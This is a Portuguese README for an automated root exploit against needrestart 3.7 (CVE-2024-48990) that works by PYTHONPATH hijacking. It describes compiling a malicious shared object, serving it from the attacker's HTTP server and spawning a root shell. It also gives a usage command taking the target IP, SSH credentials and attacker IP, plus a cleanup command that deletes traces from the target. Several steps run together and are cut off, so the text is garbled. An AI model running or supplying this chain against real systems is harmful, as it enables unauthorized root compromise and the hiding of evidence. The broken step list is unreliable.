
Exploit automatizado de escalonamento local de privilégios para CVE-2024-48990 (needrestart v3.7), aproveitando o sequestro de PYTHONPATH para obter acesso root.
Esta ferramenta automatiza a exploração de uma vulnerabilidade de escalação de privilégios no needrestart versão 3.7, identificada como CVE-2024-48990.
Ela obtém execução como root ao aproveitar o uso inseguro da variável de ambiente PYTHONPATH quando o needrestart verifica processos Python.
O exploit funciona da seguinte forma:
__init__.so) que é acionado na importação..so por meio de um servidor HTTP local.PYTHONPATH malicioso.importlib.needrestart, que herda o PYTHONPATH manipulado, carrega o módulo malicioso e executa o payload como root./tmp/poc), permitindo acesso a um shell root.Execute o exploit a partir da sua máquina atacante:
python3 exploit.py --user <ssh_user> --host <target_ip> --att-ip <attacker_ip> --ssh-pass <ssh_password>
Parâmetros:
needrestart versão 3.7Para remover os rastros do exploit do alvo:
rm -rf /tmp/malicious /tmp/poc /tmp/exploit.sh
pexpect (pip3 install pexpect)gcc (para compilar o payload)python3 -m http.server (iniciado automaticamente pelo script)needrestart (v3.7)sudo NOPASSWD para /usr/sbin/needrestartcurl instaladosEsta ferramenta é fornecida apenas para fins educacionais e de testes de segurança autorizados. Não a utilize em sistemas que você não possui ou sem permissão explícita.